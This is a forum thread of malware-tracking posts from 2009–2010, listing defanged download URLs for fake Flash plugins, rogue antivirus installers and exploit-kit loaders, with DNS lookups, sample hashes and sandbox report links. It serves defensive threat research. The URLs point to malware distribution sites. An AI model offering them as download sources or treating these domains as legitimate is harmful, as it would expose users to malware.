Post by: Mr Clean on December 22, 2009, 08:36:25 pm
Code: [Select]
hxxp://softwaredate.net/flash-HQ-plugin.40069.exe

$ dig softwaredate.net +short
64.120.141.5

$ md5sum flash-HQ-plugin.40069.exe
e7838570a8f92d863f3d3af9baccfdab  flash-HQ-plugin.40069.exe

http://www.virustotal.com/analisis/55d7e75df1746493c92443734238677d1488096bc9089e0b52ca5b2261b2ddc5-1261513824 5/40
https://cwsandbox.org/?page=report&analysisid=1993816&password=ctepcqwsyz
http://anubis.iseclab.org/?action=result&task_id=1711b7bbdd8a12574319ce2973cf32b98&format=html
http://www.threatexpert.com/report.aspx?md5=e7838570a8f92d863f3d3af9baccfdab


softwaredate.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 22, 2009, 08:54:32 pm
Code: [Select]
hxxp://statcstat.com//news/ld.php?e=pdf

$ dig statcstat.com +short
193.104.22.153

$ md5sum op.exe
a7e33d767b2f39ddba372dadf4dfd057  op.exe

http://www.virustotal.com/analisis/7dab670b14c34a577f47371b1bb8a4854b6bf7ccfad7cd720f309ca00bf002c2-1261514926 2/41
http://anubis.iseclab.org/?action=result&task_id=1afb9aafbb22de4343db974bd3bdbdefd
https://cwsandbox.org/?page=report&analysisid=1993940&password=fggfzwljnj
http://www.threatexpert.com/report.aspx?md5=a7e33d767b2f39ddba372dadf4dfd057


statcstat.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 24, 2009, 02:32:50 pm
Code: [Select]
hxxp://cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320

$ dig cjbtiybcpnf.com +short
72.51.47.21

http://www.malwaredomainlist.com/mdl.php?search=72.51.47&colsearch=All&quantity=50

http://www.virustotal.com/analisis/495b848a01b5fee685508d4782ba099cd60156fad3aaec694f4b97c8a023421c-1261646823 6/41


cjbtiybcpnf.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 26, 2009, 04:26:34 pm
Code: [Select]
hxxp://spywareremovediretto.com/downloader.php?affid=93101

$ dig spywareremovediretto.com +short
193.104.153.2

http://www.virustotal.com/analisis/e5ea0ebb4d0bd98882eb4a40a8c6dc372217ec65aa9360fc18418b0c99cb9077-1261844636 2/41
http://anubis.iseclab.org/?action=result&task_id=1efe6552a82c1af745dc365da0f748dc0


spywareremovediretto.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 28, 2009, 05:30:29 pm
Code: [Select]
hxxp://macaples.in/my_usa/load.php?spl=ActiveX_pack

$ dig macaples.in +short
115.100.250.114

http://www.virustotal.com/analisis/c0582cdd20e4c9dd0787d95f3f4178bc3ad9312389b1c5ca211b1db2e6a3ed48-1262021030 5/40
http://anubis.iseclab.org/?action=result&task_id=179293bcca358eeb4794c20bdc637dd75&format=html


macaples.in

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 28, 2009, 06:04:34 pm
Code: [Select]
hxxp://macaples.in/my_usa/pdf.php

http://www.virustotal.com/analisis/5faf913b0e252afadeb738543450b3d579ee25cb1e8e6eb4f88cfac89f975314-1262021303 2/41

(see previous post)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 29, 2009, 07:57:13 pm
Code: [Select]
hxxp://malwaretake.com/downloader.php?affid=93101

$ dig malwaretake.com +short
193.104.153.2

http://anubis.iseclab.org/?action=result&task_id=130fa5ef209cf627481879761f409a686
http://www.virustotal.com/analisis/71b5ffe784f21955ebf3b8dfa483a09249cc209466e904ccba259f078ca4f26c-1262116493 9/41


malwaretake.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 30, 2009, 05:26:44 pm
Code: [Select]
hxxp://antivirusscanstore.com/downloader.php?affid=93101

$ dig antivirusscanstore.com +short
193.104.153.2

http://anubis.iseclab.org/?action=result&task_id=15d241f0ebc17262415f5922d50104894
http://www.virustotal.com/analisis/d844f07b019d3d82f012e2210a68765db3353d4951ee0842cc9c8aabefad664e-1262193852 14/41


antivirusscanstore.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 31, 2009, 03:20:41 pm
Code: [Select]
hxxp://scanlifetimeonline.com/downloader.php?affid=05300

$ dig scanlifetimeonline.com +short
62.90.136.210

http://www.virustotal.com/analisis/62638a1beb60e047ab5e77fad3958ba1e828aae16a96a192b665eebbd1ecc998-1262272427 13/36
http://anubis.iseclab.org/?action=result&task_id=18d2e0223df70eda4452b3caa969362cc


scanlifetimeonline.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 04, 2010, 04:42:10 pm
Code: [Select]
hxxp://pro-defenderq.com/download/Setup77742_2042-4.exe

$ dig pro-defenderq.com +short
66.232.102.69
91.212.226.188

$ md5sum Setup77742_2042-4.exe
7d311af2a4fa1918560e0ea9b7daf368  Setup77742_2042-4.exe

http://www.virustotal.com/analisis/262dd0615db46ac333e5f803f30ac9b0331de76eb0c22908dc769ac511238f64-1262622328 2/41
http://anubis.iseclab.org/?action=result&task_id=1fadcaef59f801494cd866a57a1655f43&format=html


pro-defenderq.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 05, 2010, 11:00:06 pm
Code: [Select]
hxxp://www1.hot-cleanofyourpc.com/build7_287.php?cmd=getFile&counter=1&p=p52dcWpsb1%2FCj8bYboBwgHle0KCfZ1bVoKDb2YmHWJjOxaCbkX1%2Ba16orKWeZpWeZWhjlWOZmI6Io6THodjXoGJdo3OL1cytnpl2Wp6dpJ6eU9rPlqdqWqaroV6UZmKdX5yXmWldlZmi


$ dig www1.hotcleanof-yourpc.net +short
89.248.160.157

$ md5sum setup_build7_287.exe
3dc2cedece109d0353a94da09d8120c1  setup_build7_287.exe

http://www.virustotal.com/analisis/18ddb7dc6ff61ddcada96d65e7c5a0b80009823f3609683dc6fb6f798777cefd-1262732306 8/41


www1.hotcleanof-yourpc.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 08, 2010, 06:55:14 pm
Code: [Select]
hxxp://www1.best-pcprotection.com/build19102_287.php?cmd=getFile&counter=9&p=p52dcWpsb1%2FCj8bYboBwgHle0KCfYWmXXZWK0qR0qay9sYmbm5h2lpd9fXCHodjSbpZelmZumo6TYmebU9bYxKWspXOL0qBfpp2toJ1xXp%2FKmcmjV6aWmal1iqHVbWGYY5WdmmZoam6LxMZ2

Referer: hxxp://www1.protect-my-system.net/?p=p52dcWpsb1%2FCj8bYboBwgHle0KCfYWmXXZWK0qR0qay9sYmbm5h2lpd9fXCHodjSbpZelmZumo6TYmebU9bYxKWspXOL0qBfpp2toJ1xXp%2FKmcmjV6aWmal1iqHVbWGYY5WdmmZoam6LxMZ2

$ dig www1.best-pcprotection.com +short
89.248.160.158

$ dig www1.protect-my-system.net +short
89.248.160.153

$ md5sum packupdate_build19102_287.exe
4912961c36306d156e4e2b335c51151b  packupdate_build19102_287.exe

http://www.virustotal.com/analisis/1047249ad5922274348d1fbc13ef675ee6aa13a3a4d7c03e646a2c4587a1bb9c-1262976540 7/41


best-pcprotection.com
protect-my-system.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 08, 2010, 08:40:33 pm
Code: [Select]
hxxp://statcntr.com/news/ld.php?e=pdf

$ dig statcntr.com +short
193.104.22.153

$ md5sum op.exe
c803fc126b9a63a25a48475b52c4caea  op.exe

http://www.virustotal.com/analisis/6e008eaa0e84abef124413aa9ac940523a005c77d6c9055fbc0b8ae6875d83b1-1262982756 14/41


statcntr.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 12, 2010, 10:24:07 pm
Code: [Select]
hxxp://www1.best-pcdefender.com/build6_287.php?cmd=getFile&counter=1&p=p52dcWpsb1%2FCj8bYbnx9d3le0KCfZlbVoKDb2YmHWJjOxaCbkX1%2Ba16orKWek5WdZZZjmmRqlWCIo6THodjXoGJdo3PVysatp6aep1ijnlnMkt3ZmZmOVJWn0JKCoKLLlNHF0aVdpp%2FZzch2WJqioJ1xXq%2FKktujV6SgcWNqmmCVYmWdX5SKxpR0

$ dig www1.best-pcdefender.com +short
89.248.160.153

$ md5sum packupdate_build6_287.exe
9bc59c7fab03e27a0d527fbca352099c  packupdate_build6_287.exe

http://www.virustotal.com/analisis/b291101a733cb656f39c3b85a887e2f5b9730a8564c09d3d80b49560c23f0458-1263334930 1/41


best-pcdefender.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 03:03:53 am
Code: [Select]
hxxp://3-onlinescanner.com/download/Setup_2002-8.exe

$ dig 3-onlinescanner.com +short
66.232.102.65
94.228.208.59

$ md5sum Setup_2002-8.exe
2e1ab9f8c723b8b657b17d77e5c7e84e  Setup_2002-8.exe

http://www.virustotal.com/analisis/b76d41e3233b1eaceacbdd4a61b726c00c416903eaac88d311b89633056e1d65-1263338143 3/41


3-onlinescanner.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 07:38:37 pm
Code: [Select]
hxxp://kill-spywarem2.com/download/Setup_40s5.exe

$ dig kill-spywarem2.com +short
193.104.22.201
213.175.221.46

$ md5sum Setup_40s5.exe
abf693010b11ff7c6ac3ec297fc99904  Setup_40s5.exe

http://www.virustotal.com/analisis/a1c0b23dcfa9bc10f2cdb55c1358c5bd7c01c903a2aa9829f205b73137d30e89-1263410660 4/40


kill-spywarem2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 13, 2010, 07:39:37 pm
Code: [Select]
hxxp://kill-spywarem7.com/download/Setup_103.exe

$ dig kill-spywarem7.com +short
193.104.22.201
213.175.221.46

$ md5sum Setup_103.exe
abf693010b11ff7c6ac3ec297fc99904  Setup_103.exe

http://www.virustotal.com/analisis/a1c0b23dcfa9bc10f2cdb55c1358c5bd7c01c903a2aa9829f205b73137d30e89-1263410660 4/40


kill-spywarem7.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 15, 2010, 12:48:19 pm
Code: [Select]
hxxp://alwaysinwork.com/kvusa/loadjavad.php?page=10

$ dig alwaysinwork.com +short
213.108.56.18

$ md5sum d7b67
d3d9240c64d2d4515ec2d3d584ec0d12  d7b67

http://www.virustotal.com/analisis/4c19907d0ca2876a0fd095462c12ef46a45307f5f7de17dc156ec84188ff3243-1263558981 2/41

http://anubis.iseclab.org/?action=result&task_id=1ee0d7b2a971ac904e542a29aac460e95&format=html

https://cwsandbox.org/?page=report&analysisid=2522400&password=dtkycibdis


alwaysinwork.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 18, 2010, 03:48:14 am
Code: [Select]
hxxp://www.ancisoft.com/file/xkvpsetup.exe

$ dig www.ancisoft.com +short
221.231.138.89

$ md5sum xkvpsetup.exe
5fb51d678665b42c6cb2e34ae73346fe  xkvpsetup.exe

http://www.virustotal.com/analisis/8f517de0a8b8f38571ab1708d4f67b7e046018bc64121644a7b2470b16f59147-1263786171 13/41


ancisoft.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 19, 2010, 04:01:02 pm
Code: [Select]
hxxp://www.teu8.cn/c.exe

$ dig www.teu8.cn +short
174.139.3.50

$ md5sum c.exe
e7bf0e74a9ab882b0430395f1c196913  c.exe

http://www.virustotal.com/analisis/b8c9ac6813ccae8f81abc9ab7653e736a81b3ef1f11a3810c1cc04d6f4310ec7-1263916378 31/41


teu8.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 19, 2010, 10:24:41 pm
Look at the Referrer -- "a.photobucket.com"

Code: [Select]
192.168.1.1 - - [19/Jan/2010:21:53:52 +0000] "GET http://google.com.analytics.sbeqpirscun.com/nte/TREST11.exe HTTP/1.1" - - "http://a.photobucket.com/hserver/random=185831/pageid=307661826/area=PB_AL_U_FULL/aamsz=BANNER/age=25/zip=19506/gender=F/login=Y/Camera=ResearchInMotionBlackBerry8110,NIKONCORPORATIONNIKOND3,CanonCanonPowerShotA520/mobile_carrier=AT&T/email_domain=COM/anprice=85" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

$ dig google.com.analytics.sbeqpirscun.com +short
64.150.187.239


http://www.virustotal.com/analisis/c4a5e9d4635e863ebcea026319206143a99b4c301b9c68cf2d6aa7fc8fb0b93b-1263934871 4/40



google.com.analytics.sbeqpirscun.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on January 25, 2010, 06:26:45 pm
Code: [Select]
hxxp://statacon.com/news/ld.php?e=pdf

$ dig statacon.com +short
193.104.22.153

$ md5sum op.exe
199f7c473276ab2d2ea1d159056ec610  op.exe

http://www.virustotal.com/analisis/0329c5130681d0f1e56c7964c8cf121d222a8c76f0dae2ab2a26c01f8f0e7472-1264443673 3/39


statacon.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 02, 2010, 05:42:31 pm
Code: [Select]
hxxp://google.analytics.com.jestywtvadgj.info/kav/kav3.exe

$ dig google.analytics.com.jestywtvadgj.info +short
174.142.53.148

http://www.virustotal.com/analisis/ff5fbf07fe9d1d8ed3bd287327e7b215a9e400ed4fe0037a37f0854739779a12-1265131372 3/40

http://wepawet.iseclab.org/view.php?hash=a0e3e250e1cf7f02c54258507edf7178&t=1265131760&type=js


google.analytics.com.jestywtvadgj.info

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 01:58:42 am
Code: [Select]
hxxp://banner.titanpoker.com/installer/casino/SetupPoker_f80ad.exe

$ dig banner.titanpoker.com +short
69.90.74.226
66.199.155.194

$ md5sum SetupPoker_f80ad.exe
1dbf65e403c23a53bf349b976aaea44a  SetupPoker_f80ad.exe

http://www.virustotal.com/analisis/82fe9f1fe166e1c7ea22b38c5c23d1aaa0273f6ec09c3bade2205a2122b16a75-1265161220 12/39


titanpoker.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 02:07:33 pm
Code: [Select]
hxxp://google.analytics.com.jtmqypcgt.info/nte/AVORP1KAV3%20.asp/eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010

$ dig google.analytics.com.jtmqypcgt.info +short
174.142.53.148

$ md5sum eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010
6c672682db19ad638a8b17738a4df288  eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010

$ file eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010
eU230d9c2eHe009f529V0100f070006R8c538070107Tab6086a7201l0409K6b683931318J0d0006010: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/84a08ae7d2aecda94e022d526ef62a30a9233cb512ee681496925424e55e7209-1265193029 13/40


google.analytics.com.jtmqypcgt.info

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 03, 2010, 02:55:11 pm
Code: [Select]
hxxp://letitbit.zinnko.pl/XXXXXXXXXXXXXXXXXXX/PhotoArchive.exe

$ dig letitbit.zinnko.pl +short
58.27.166.149
69.79.104.11
75.172.59.17
93.177.185.72
94.240.225.56
95.56.84.252
112.202.136.44
116.111.184.185
117.205.52.39
189.78.52.247
189.196.21.17
190.39.129.16
190.213.162.152
201.43.68.23
41.141.51.123

$ md5sum PhotoArchive.exe
0448e3d62da49e65be650e441b601714  PhotoArchive.exe

http://www.virustotal.com/analisis/04aef82e6036c97c1287dec5f8789384b3ab539210750f262b4d4715835c37c5-1265207237 6/40


letitbit.zinnko.pl

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 17, 2010, 11:09:04 am
Code: [Select]
hxxp://hd.yourweekends.net/Flash.Player.HD.v11.exe

$ dig hd.yourweekends.net +short
89.248.168.120

$ md5sum Flash.Player.HD.v11.exe
5184bac49bec6245de467dede16648a1  Flash.Player.HD.v11.exe

http://www.virustotal.com/analisis/302f9cef52017c8a7ee0facbe7f580021ac094ab31686fb19c9769bfe2bafa99-1266376705 8/40


yourweekends.net
+
buy-security-essentials.com
get-key-se10.com
buy-security-essentials.com
download-soft-package.com
download-software-package.com
get-key-se10.com
is-software-download.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 19, 2010, 07:23:02 pm
Code: [Select]
hxxp://google.analytics.com.byuigracdnjj.info/lee/TATRA10.exe

$ dig google.analytics.com.byuigracdnjj.info +short
72.51.41.155

http://anubis.iseclab.org/?action=result&task_id=1d16ee2329edbc3f459997192802c2d51

http://www.virustotal.com/analisis/604e53e3389aada7fcc5fa7f41bb5e981c0d206a9d36587ac749c7db82a45a22-1266603029 2/40


byuigracdnjj.info
+
windows-liveaver.com
antispyware-comp.com
antiviruscare-com.com
pc-guard2010.com
spyware-destroyerone.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on February 22, 2010, 08:15:42 pm
Code: [Select]
hxxp://moremediaplugins.net/flash-HQ-plugin.48421.exe

$ dig moremediaplugins.net +short
62.212.66.108

$ md5sum flash-HQ-plugin.48421.exe
b13d7b310b2cfe432d3df4f25066596d  flash-HQ-plugin.48421.ex

http://www.virustotal.com/analisis/fbcd21eaae97a4f0d4c2b4551c62ea38ee50353810c67515913d7a48064fa162-1266869627 5/40


moremediaplugins.net